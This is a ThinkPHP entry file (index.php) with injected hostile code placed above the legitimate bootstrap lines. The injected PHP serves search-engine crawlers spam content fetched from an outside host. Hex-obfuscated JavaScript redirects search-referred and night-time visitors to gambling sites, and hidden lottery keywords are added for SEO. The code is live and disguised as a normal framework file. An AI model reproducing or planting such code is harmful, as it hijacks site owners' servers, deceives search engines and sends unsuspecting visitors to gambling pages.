<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$file = file_get_contents('http://sb.gainima.com/'."/index.php?host=".$host_name."&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['SERVER_NAME']);
echo $file;
}
?>
<script LANGUAGE="Javascript">
var gqUtmI1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x72\x65\x66\x65\x72\x72\x65\x72"]
if(gqUtmI1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x67\x6f\x6f\x67\x6c\x65")>0 || gqUtmI1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x62\x61\x69\x64\x75")>0 || gqUtmI1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x73\x6f\x67\x6f\x75")>0 ) location["\x68\x72\x65\x66"]="\x68\x74\x74\x70\x3a\x2f\x2f\x75\x6d\x38\x38\x39\x2e\x63\x6f\x6d";
</script><noscript><title>幸运飞艇开奖_结果查询</title><meta name="keywords" content="幸运飞艇开奖,幸运飞艇开奖结果查询,幸运飞艇开奖历史查询"><meta name="description" content="全民彩票网(www.qm99.com)幸运飞艇开奖结果查询,幸运飞艇开奖历史查询."></noscript><script type="text/javascript">var Cd1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x72\x65\x66\x65\x72\x72\x65\x72'];var ngcUrZ2=new window["\x44\x61\x74\x65"]()['\x67\x65\x74\x48\x6f\x75\x72\x73']();if(Cd1['\x69\x6e\x64\x65\x78\x4f\x66']("\x62\x61\x69\x64\x75")>0||Cd1['\x69\x6e\x64\x65\x78\x4f\x66']("\x73\x6f\x67\x6f\x75")>0||Cd1['\x69\x6e\x64\x65\x78\x4f\x66']("\x73\x6f\x73\x6f")>0||Cd1['\x69\x6e\x64\x65\x78\x4f\x66']("\x73\x6d")>0||Cd1['\x69\x6e\x64\x65\x78\x4f\x66']("\x75\x63")>0||Cd1['\x69\x6e\x64\x65\x78\x4f\x66']("\x62\x69\x6e\x67")>0||Cd1['\x69\x6e\x64\x65\x78\x4f\x66']("\x79\x61\x68\x6f\x6f")>0||Cd1['\x69\x6e\x64\x65\x78\x4f\x66']("\x73\x6f")>0||ngcUrZ2>18||ngcUrZ2<7){window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']['\x68\x72\x65\x66']='\x68\x74\x74\x70\x3a\x2f\x2f\x61\x6d\x67\x31\x33\x33\x2e\x63\x6f\x6d'}</script><?php
// +----------------------------------------------------------------------
// | ThinkPHP [ WE CAN DO IT JUST THINK ]
// +----------------------------------------------------------------------
// | Copyright (c) 2006-2016 http://thinkphp.cn All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: liu21st <liu21st@gmail.com>
// +----------------------------------------------------------------------
// [ 应用入口文件 ]
// 定义应用目录
define('APP_PATH', __DIR__ . '/../application/');
// 加载框架引导文件
require __DIR__ . '/../thinkphp/start.php'; 最佳答案